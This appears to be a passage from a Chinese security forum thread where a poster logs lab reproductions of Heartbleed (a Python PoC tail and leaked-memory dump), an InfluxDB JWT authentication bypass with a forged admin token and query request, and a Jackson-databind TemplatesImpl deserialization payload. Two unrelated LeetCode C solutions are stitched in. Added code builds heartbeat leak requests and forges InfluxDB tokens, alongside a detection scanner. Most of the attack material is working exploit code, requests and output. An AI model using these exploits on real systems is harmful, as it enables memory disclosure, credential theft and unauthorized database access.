        pdat = ''.join((chr(c) if 32 <= c <= 126 else '.' )for c in lin)
        print('  %04x: %-48s %s' % (b, hxdat, pdat))
   
    print("")

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = b''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print('Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print('No heartbeat response received, server likely not vulnerable')
            return False

        if typ == 24:
            print('Received heartbeat response:')
            hexdump(pay)
            if len(pay) > 3:
                print('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print('Server processed malformed heartbeat, but did not return any extra data.')
            return True

        if typ == 21:
            print('Received alert:')
            hexdump(pay)
            print('Server returned error, likely not vulnerable')
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print('Connecting...')
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print('Sending Client Hello...')
    sys.stdout.flush()
    s.send(hello)
    print('Waiting for Server Hello...')
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print('Server closed connection without sending Server Hello.')
            return
        # Look for server hello done message.
        if typ == 22 and pay[0] == 0x0E:
            break

    print('Sending heartbeat request...')
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
```

Run it with:

```
python3 <filename> <ip-address>
```

Result (partial):

```
python3 CVE-2014-0160.py 127.0.0.1      
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 822
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 18 03 02 00 03 01 40 00 9B 72 0B BC 0C  .@.......@..r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00  ....#...........
```


Strangely, though, I didn't get the hoped-for result (a cookie).

---

The error when running it with Python 2 is as follows:

```
  File "CVE-2014-0160.py", line 44
    def hexdump(s: bytes):
                 ^
SyntaxError: invalid syntax
```


# InfluxDB unauthorized access vulnerability

After opening it, the page is:

```
404 page not found
```


Nothing at all there; it turns out the address to visit is:

```
<ip-address>:8086/debug/vars
```

This returns the following page (only part of the information is copied here):

```
{
"system": {"currentTime":"2021-11-07T02:22:39.189245668Z","started":"2021-11-07T02:19:10.886436276Z","uptime":208},
"cmdline": ["influxd"],
"memstats": {"Alloc":3930848,"TotalAlloc":21201816,"Sys":11671800,"Lookups":1071,"Mallocs":326829,"Frees":304215,"HeapAlloc":3930848,"HeapSys":7634944,"HeapIdle":1966080,"HeapInuse":5668864,"HeapReleased":0,"HeapObjects":22614,"StackInuse":753664,"StackSys":753664,"MSpanInuse":75696,"MSpanSys":98304,"MCacheInuse":6944,"MCacheSys":16384,"BuckHashSys":1448975,"GCSys":479232,"OtherSys":1240297,"NextGC":5527264,"LastGC":1636251710030723824,"PauseTotalNs":1541211,"PauseNs":[85786,240697,122788,151365,158038,120096,191089,335247,136105,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"PauseEnd":[1636251551320297500,1636251551333176071,1636251551343051201,1636251551352092229,1636251551360037982,1636251551366007666,1636251570025215594,1636251630006504159,1636251710030723824,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"NumGC":9,"NumForcedGC":0,"GCCPUFraction":0.00006218672473663532,"EnableGC":true,"DebugGC":false,"BySize":[{"Size":0,"Mallocs":0,"Frees":0},{"Size":8,"Mallocs":789,"Frees":685},{"Size":16,"Mallocs":129249,"Frees":121318},{"Size":32,"Mallocs":85712,"Frees":77540},{"Size":48,"Mallocs
":15338,"Frees":13653},{"Size":64,"Mallocs":6753,"Frees":5938},{"Size":80,"Mallocs":11416,"Frees":11131},{"Size":96,"Mallocs":1323,"Frees":1044},{"Size":112,"Mallocs":1671,"Frees":1534},{"Size":128,"Mallocs":958,"Frees":856},{"Size":144,"Mallocs":452,"Frees":341},{"Size":160,"Mallocs":1713,"Frees":1395},{"Size":176,"Mallocs":600,"Frees":526},{"Size":192,"Mallocs":206,"Frees":171},{"Size":208,"Mallocs":2165,"Frees":1737},{"Size":224,"Mallocs":2196,"Frees":1706},{"Size":240,"Mallocs":256,"Frees":187},{"Size":256,"Mallocs":280,"Frees":110},{"Size":288,"Mallocs":460,"Frees":354},{"Size":320,"Mallocs":819,"Frees":654},{"Size":352,"Mallocs":352,"Frees":256},{"Size":384,"Mallocs":157,"Frees":9},{"Size":416,"Mallocs":90,"Frees":55},{"Size":448,"Mallocs":174,"Frees":137},{"Size":480,"Mallocs":21,"Frees":13},{"Size":512,"Mallocs":303,"Frees":172},{"Size":576,"Mallocs":379,"Frees":300},{"Size":640,"Mallocs":34,"Frees":22},{"Size":704,"Mallocs":86,"Frees":69},{"Size":768,"Mallocs":784,"Frees":782},{"Size":896,"Mallocs":215,"Frees":167},{"Size":1024,"Mallocs":292,"Frees":199},{"Size":1152,"Mallocs":233,"Frees":188},{"Size":1280,"Mallocs":159,"Frees":148},{"Size":1408,"Mallocs":1022,"Frees":836},{"Size":1536,"Mallocs":243,"Frees":222},{"Size":1792,"Mallocs":171,"Frees":154},{"Size":2048,"Mallocs":425,"Frees":384},{"Size":2304,"Mallocs":95,"Frees":84},{"Size":2688,"Mallocs":169,"Frees":163},{"Size":3072,"Mallocs":17,"Frees":17},{"Size":3200,"Mallocs":8,"Frees":7},{"Size":3456,"Mallocs":3,"Frees":3},{"Size":4096,"Mallocs":30,"Frees":19},{"Size":4864,"Mallocs":7,"Frees":6},{"Size":5376,"Mallocs":4,"Frees":0},{"Size":6144,"Mallocs":35,"Frees":18},{"Size":6528,"Mallocs":1,"Frees":1},{"Size":6784,"Mallocs":0,"Frees":0},{"Size":6912,"Mallocs":0,"Frees":0},{"Size":8192,"Mallocs":13,"Frees":2},{"Size":9472,"Mallocs":7,"Frees":1},{"Size":9728,"Mallocs":0,"Frees":0},{"Size":10240,"Mallocs":0,"Frees":0},{"Size":10880,"Mallocs":0,"Frees":0},{"Size":12288,"Mallocs":37,"Frees":22},{"Size":13568
,"Mallocs":1,"Frees":1},{"Size":14336,"Mallocs":0,"Frees":0},{"Size":16384,"Mallocs":1,"Frees":0},{"Size":18432,"Mallocs":2,"Frees":1},{"Size":19072,"Mallocs":0,"Frees":0}]},
"runtime": {"name":"runtime","tags":{},"values":{"Alloc":3842640,"Frees":304183,"HeapAlloc":3842640,"HeapIdle":2031616,"HeapInUse":5603328,"HeapObjects":22355,"HeapReleased":0,"HeapSys":7634944,"Lookups":1069,"Mallocs":326538,"NumGC":9,"NumGoroutine":21,"PauseTotalNs":1541211,"Sys":11671800,"TotalAlloc":21113608}},
"queryExecutor": {"name":"queryExecutor","tags":null,"values":{"queriesActive":0,"queriesExecuted":0,"queriesFinished":0,"queryDurationNs":0,"recoveredPanics":0}},
"database:_internal": {"name":"database","tags":{"database":"_internal"},"values":{"numMeasurements":12,"numSeries":12}},
"shard:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"shard","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"diskBytes":42229,"fieldsCreate":111,"seriesCreate":12,"writeBytes":0,"writePointsDropped":0,"writePointsErr":0,"writePointsOk":222,"writeReq":19,"writeReqErr":0,"writeReqOk":19}},
"tsm1_engine:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_engine","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"cacheCompactionDuration":0,"cacheCompactionErr":0,"cacheCompactions":0,"cacheCompactionsActive":0,"tsmFullCompactionDuration":0,"tsmFullCompactionErr":0,"tsmFullCompactionQueue":0,"tsmFullCompactions":0,"tsmFullCompactionsActive":0,"tsmLevel1CompactionDuration":0,"tsmLevel1CompactionErr":0,"tsmLevel1CompactionQueue":0,"tsmLevel1Compactions":0,"tsmLevel1CompactionsActive":0,"tsmLevel2CompactionDuration":0,"tsmLevel2CompactionErr":0,"tsmLevel2CompactionQueue":0,"tsmLevel2Compactions":0,"tsmLevel2CompactionsActive":0,"tsmLevel3CompactionDuration":0,"tsmLevel3CompactionErr":0,"tsmLevel3CompactionQueue":0,"tsmLevel3Compactions":0,"tsmLevel3CompactionsActive":0,"tsmOptimizeCompactionDuration":0,"tsmOptimizeCompactionErr":0,"tsmOptimizeCompactionQueue":0,"tsmOptimizeCompactions":0,"tsmOptimizeCompactionsActive":0}},
"tsm1_cache:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_cache","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"WALCompactionTimeMs":0,"cacheAgeMs":189002,"cachedBytes":0,"diskBytes":0,"memBytes":47000,"snapshotCount":0,"writeDropped":0,"writeErr":0,"writeOk":19}},
"tsm1_filestore:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_filestore","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"diskBytes":0,"numFiles":0}},
"tsm1_wal:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_wal","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"currentSegmentDiskBytes":42229,"oldSegmentsDiskBytes":0,"writeErr":0,"writeOk":19}},
"write": {"name":"write","tags":null,"values":{"pointReq":222,"pointReqLocal":222,"req":19,"subWriteDrop":0,"subWriteOk":19,"writeDrop":0,"writeError":0,"writeOk":19,"writeTimeout":0}},
"subscriber": {"name":"subscriber","tags":null,"values":{"createFailures":0,"pointsWritten":0,"writeFailures":0}},
"cq": {"name":"cq","tags":null,"values":{"queryFail":0,"queryOk":0}},
"httpd::8086": {"name":"httpd","tags":{"bind":":8086"},"values":{"authFail":0,"clientError":0,"pingReq":0,"pointsWrittenDropped":0,"pointsWrittenFail":0,"pointsWrittenOK":0,"promReadReq":0,"promWriteReq":0,"queryReq":0,"queryReqDurationNs":0,"queryRespBytes":0,"recoveredPanics":0,"req":5,"reqActive":1,"reqDurationNs":720652,"serverError":0,"statusReq":0,"writeReq":0,"writeReqActive":0,"writeReqBytes":0,"writeReqDurationNs":0}}
}
```


After capturing the request with Burp Suite, modify the packet to the following (executing a SQL statement):

```
POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show+users
```


We get the following response:

```
HTTP/1.1 200 OK
Content-Type: application/json
Request-Id: 7851a564-3f72-11ec-8001-000000000000
X-Influxdb-Build: OSS
X-Influxdb-Version: 1.6.6
X-Request-Id: 7851a564-3f72-11ec-8001-000000000000
Date: Sun, 07 Nov 2021 02:29:01 GMT
Connection: close
Content-Length: 99

{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true]]}]}]}
```


---

PS:

The token in the packet,

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
```

is generated as follows, using https://jwt.io/ to build the JWT token.

Header:

```
{
  "alg": "HS256",
  "typ": "JWT"
}
```

Payload:

```
{
  "username": "admin",
  "exp": 1676346267
}
```

Here admin is a user that already exists, and exp is a timestamp giving the token's expiry time; you need to set it to a timestamp in the future.

The final generated token is the one used in the Authorization header above.

# 20211026 Roman to Integer

> Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M.
>
> Symbol        Value
> I             1
> V             5
> X             10
> L             50
> C             100
> D             500
> M             1000
>
> For example, 2 is written as II in Roman numerals, just two ones added together. 12 is written as XII, which is simply X + II. 27 is written as XXVII, which is XX + V + II.
>
> Roman numerals are usually written largest to smallest from left to right. However, the numeral for four is not IIII; instead it is written as IV. Because the one is before the five, we subtract it, making four. The same principle applies to the number nine, which is written as IX. There are six instances where subtraction is used:
>
>  I can be placed before V (5) and X (10) to make 4 and 9.
>  X can be placed before L (50) and C (100) to make 40 and 90.
>  C can be placed before D (500) and M (1000) to make 400 and 900.
>
> Given a Roman numeral, convert it to an integer. The input is guaranteed to be in the range from 1 to 3999.

```c
#include <stdio.h>
#include <string.h>

int romanToInt(char * s){
    int temp = 0;
    for (int i = 0; i < strlen(s); i++)
    {
        switch (s[i])
        {
        case 'M':
            temp = temp + 1000;
            break;
        case 'D':
            temp = temp + 500;
            break;
        case 'C':
            if(s[i + 1] == 'M')
            {
                temp  = temp + 900;
                i++;                //跳过下一个数,因为已经用过了。
                break;
            }
            else if(s[i + 1] == 'D')
            {
                temp  = temp + 400;
                i++;
                break;
            }
            else
            {
                temp = temp + 100;
                break;
            }           
        case 'L':
            temp = temp + 50;
            break;
        case 'X':
            if(s[i + 1] == 'C')
            {
                temp  = temp + 90;
                i++;               
                break;
            }
            else if(s[i + 1] == 'L')
            {
                temp  = temp + 40;
                i++;
                break;
            }
            else
            {                           
                temp = temp + 10;
                break;
            }
        case 'V':
            temp = temp + 5;
            break;
        case 'I':
            if(s[i + 1] == 'X')
            {
                temp  = temp + 9;
                i++;               
                break;
            }
            else if(s[i + 1] == 'V')
            {
                temp  = temp + 4;
                i++;
                break;
            }
            else
            {
                temp = temp + 1;
                break;               
            }     
        default:
            printf("input is error");
            break;
        }
    }/*end for*/
    return temp;
}
```

# 20211107 Longest Common Prefix

Write a function to find the longest common prefix string amongst an array of strings.

If there is no common prefix, return an empty string `""`.

PS: if an array s[a] is defined, its element s[j] can be accessed through the pointer *



```c
#include <stdlib.h>
#include <string.h>

char * longestCommonPrefix(char ** strs, int strsSize){
    if (strsSize == 0)  // the input may be empty; if a submission runs suspiciously fast, it probably got an empty input
    {
        return "";
    }
    char *str = (char*)calloc(128, sizeof(char));  // 128 bytes to hold the common prefix
    for (int i = 0, j; i < strlen(*strs); i++)  // outer loop over the first string: the prefix can be no longer than it
    {
        for (j = 0; j < strsSize - 1; j++)  // inner loop over the strings; strsSize-1 because we read strs[j+1]
        {
            if (strs[j][i] != strs[j+1][i])  // position i differs between neighbours: the prefix ended at i-1
            {
                return str;
            }
        }
        str[i] = strs[0][i];  // every string agreed on position i, so append that character to the prefix
    }
    return str;
}
```

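The record layout behind the Heartbleed PoC and the dump above, as an added example (mine, not part of the post or of the PoC script): build_heartbeat_record produces the exact eight bytes the PoC sends, a heartbeat request claiming a 0x4000-byte payload while carrying none; parse_records splits the server's reply into TLS records; heartbeat_leak isolates the bytes returned beyond the three the server should have echoed; and printable_strings pulls ASCII runs out of them. The sample response is constructed inline. In the real dump above the leaked region starts with the server's copy of our own Client Hello, and what follows depends on what happens to sit next to the heartbeat buffer in the server's heap, which is why the PoC is normally run many times and its output searched for strings such as Cookie.

```python
import struct

HEARTBEAT = 24   # TLS content type of heartbeat records
HANDSHAKE = 22
ALERT = 21
TLS1_1 = 0x0302


def build_heartbeat_record(claimed_len: int, payload: bytes = b"", version: int = TLS1_1) -> bytes:
    """Heartbeat request whose declared payload_length may exceed the bytes sent.
    claimed_len=0x4000 with an empty payload gives the PoC's 18 03 02 00 03 01 40 00."""
    body = struct.pack(">BH", 1, claimed_len) + payload  # 1 = heartbeat_request
    return struct.pack(">BHH", HEARTBEAT, version, len(body)) + body


def parse_records(data: bytes):
    """Split a byte stream into TLS records as (type, version, payload) tuples;
    a truncated trailing record is dropped."""
    records, i = [], 0
    while i + 5 <= len(data):
        typ, ver, ln = struct.unpack(">BHH", data[i:i + 5])
        if i + 5 + ln > len(data):
            break
        records.append((typ, ver, data[i + 5:i + 5 + ln]))
        i += 5 + ln
    return records


def heartbeat_leak(response_payload: bytes, sent_payload: bytes = b"") -> bytes:
    """Bytes the server returned beyond what a correct implementation would echo.
    A patched server drops the request (no type-24 record) or echoes only the
    bytes it received; a vulnerable one copies payload_length bytes from memory."""
    echoed = 3 + len(sent_payload)  # response type + 2-byte length + what we actually sent
    return response_payload[echoed:] if len(response_payload) > echoed else b""


def printable_strings(buf: bytes, min_len: int = 6):
    """ASCII runs in the leaked memory: this is where cookies or credentials
    show up if they happened to be adjacent in the server's heap."""
    out, run = [], bytearray()
    for b in buf:
        if 32 <= b <= 126:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode())
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode())
    return out


# Constructed sample response: one heartbeat record whose payload starts with the
# 3-byte echo of our request (02 40 00) and then 64 bytes of "leaked" heap
# containing a cookie header.
LEAKED_HEAP = b"\x00" * 10 + b"Cookie: session=deadbeef" + b"\x00" * 30
SAMPLE_RESPONSE = (
    struct.pack(">BHH", HEARTBEAT, TLS1_1, 3 + len(LEAKED_HEAP))
    + b"\x02\x40\x00" + LEAKED_HEAP
)

if __name__ == "__main__":
    print(build_heartbeat_record(0x4000).hex())
    for typ, ver, payload in parse_records(SAMPLE_RESPONSE):
        if typ == HEARTBEAT:
            print(printable_strings(heartbeat_leak(payload)))
```

With a live target you would replace SAMPLE_RESPONSE by the bytes read after the Server Hello Done, exactly as the PoC does, and loop: each heartbeat returns a fresh 16 KiB slice of whatever the allocator handed out last.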

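How the bearer token above is produced and checked, as an added example (mine, not InfluxDB's code): forge_influx_jwt builds the HS256 token from the header and claims shown in the jwt.io step, verify_influx_jwt is the kind of server-side check the bypass defeats, and query_request builds the same POST /query request used above. The example assumes the InfluxDB shared secret is unset, i.e. the empty string, which the page does not state; for that reason only the header and claims segments of the page's token are compared here, not its signature. PAGE_HEADER_AND_CLAIMS is copied from the token above.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


def b64url(raw: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_influx_jwt(username: str, exp: int, shared_secret: bytes = b"") -> str:
    """HS256 token with the header and claims from the jwt.io step above.
    InfluxDB checks the signature with its configured shared secret; the
    default of b"" here is the assumption that the secret is unset."""
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"username": username, "exp": exp}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    sig = hmac.new(shared_secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def verify_influx_jwt(token: str, shared_secret: bytes, now: Optional[int] = None) -> dict:
    """Server-side check: pin the algorithm, recompute the HMAC with the configured
    secret, reject bad signatures and expired tokens, and return the claims."""
    try:
        h, c, s = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(shared_secret, f"{h}.{c}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(c))
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        raise ValueError("token expired")
    return claims


def query_request(host: str, token: str, db: str, q: str) -> str:
    """The raw POST /query request used above, with the forged bearer token."""
    body = f"db={db}&q={q.replace(' ', '+')}"
    return (
        f"POST /query HTTP/1.1\r\nHost: {host}\r\n"
        f"Authorization: Bearer {token}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


# Header and claims segments of the token shown above (copied from the page).
PAGE_HEADER_AND_CLAIMS = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ"
)

if __name__ == "__main__":
    tok = forge_influx_jwt("admin", 1676346267)
    print(tok)
    print(query_request("your-ip", tok, "sample", "show users"))
```

The defence is the same as for any shared-key JWT: the server must refuse to start with an empty or default secret, and verification must pin the algorithm before touching the signature.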
Original poster | Posted on 2021-11-8 22:30:24
Today I did one reproduction and then worked on my data structures homework (it should be finished tomorrow; I'll post it once it's done, so here is the reproduction first):
# Jackson-databind 反序列化漏洞(CVE-2017-7525)

Visiting the corresponding URL gives this:

```
<html>
        <body>
                <h1>Whitelabel Error Page</h1>
                <p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p>
                <div id='created'>Mon Nov 08 08:25:36 UTC 2021</div>
                <div>There was an unexpected error (type=Not Found, status=404).</div>
                <div>No message available</div>
        </body>
</html>
```


Open Burp Suite to capture the request, and modify the packet to the following:

```
POST /exploit HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "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"
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}
```


After clicking Forward, we get the following:

```
["java.util.LinkedHashMap",{"timestamp":["java.util.Date",1636360836626],"status":400,"error":"Bad Request","exception":"org.springframework.http.converter.HttpMessageNotReadableException","message":"JSON parse error: null; nested exception is com.fasterxml.jackson.databind.JsonMappingException: N/A\n at [Source: java.io.PushbackInputStream@4976515e; line: 9, column: 27] (through reference chain: com.b1ngz.sec.model.Target[\"param\"]->com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl[\"outputProperties\"])","path":"/exploit"}]
```


Entering a bash shell in the container and listing /tmp, there is a file named prove1.txt (the file from the base64-encoded payload in the packet above):

```
docker-compose exec web bash

root@10012d3cfbaa:/opt/jdk# ls /tmp
hsperfdata_root  prove1.txt  tomcat-docbase.7120293030886343503.8080  tomcat.6384565990007858766.8080
```


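A detection-side example added here (mine, not Jackson's or the target application's code): the request above abuses Jackson's polymorphic typing, where a JSON array of the form [class name, value] tells ObjectMapper which class to instantiate when enableDefaultTyping() is on, so a TemplatesImpl with attacker-supplied transletBytecodes gets its bytecode loaded and its static initialiser run (the /tmp/prove1.txt above). scan_body walks a request body and reports every such type id, flagging the TemplatesImpl gadget class; DANGEROUS_CLASSES is a short illustrative list, not jackson-databind's own deny list, and SAMPLE_EXPLOIT is the request above with a placeholder in place of the class bytes.

```python
import json
import re

# Gadget classes commonly abused through Jackson polymorphic typing; the first
# is the one used in the request above. Illustrative list, not the library's.
DANGEROUS_CLASSES = {
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "org.apache.xalan.xsltc.trax.TemplatesImpl",
}
JAVA_CLASS_NAME = re.compile(r"^[a-z][\w$]*(\.[\w$]+)+$")


def find_polymorphic_types(doc, path="$"):
    """Walk parsed JSON and list every two-element array whose first element
    looks like a Java class name. That [class, value] shape is how Jackson
    encodes a type id with default typing, and it is what "param" carries above.
    Returns (json path, class name, dangerous) tuples."""
    hits = []
    if isinstance(doc, list):
        if len(doc) == 2 and isinstance(doc[0], str) and JAVA_CLASS_NAME.match(doc[0]):
            hits.append((path, doc[0], doc[0] in DANGEROUS_CLASSES))
        for i, item in enumerate(doc):
            hits.extend(find_polymorphic_types(item, f"{path}[{i}]"))
    elif isinstance(doc, dict):
        for key, value in doc.items():
            hits.extend(find_polymorphic_types(value, f"{path}.{key}"))
    return hits


def scan_body(body: str):
    """Parse a request body and return its polymorphic type ids ([] if not JSON)."""
    try:
        return find_polymorphic_types(json.loads(body))
    except ValueError:
        return []


def is_suspicious_body(body: str) -> bool:
    """True when the body names a known gadget class as a type id."""
    return any(dangerous for _, _, dangerous in scan_body(body))


# Constructed sample: the request above with the class bytes replaced by a
# placeholder (the real payload is a base64-encoded class file).
SAMPLE_EXPLOIT = json.dumps({
    "param": [
        "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        {"transletBytecodes": ["yv66vgAAADQ="], "transletName": "a.b", "outputProperties": {}},
    ]
})

if __name__ == "__main__":
    for path, cls, dangerous in scan_body(SAMPLE_EXPLOIT):
        print(path, cls, "DANGEROUS" if dangerous else "ok")
```

The server's own error response above has the same shape (["java.util.LinkedHashMap", {...}], ["java.util.Date", ...]), which is a strong hint that default typing is enabled on that endpoint; the scanner reports those as type ids too, just not as dangerous ones.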
安全矩阵

GMT+8, 2024-11-28 01:35

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.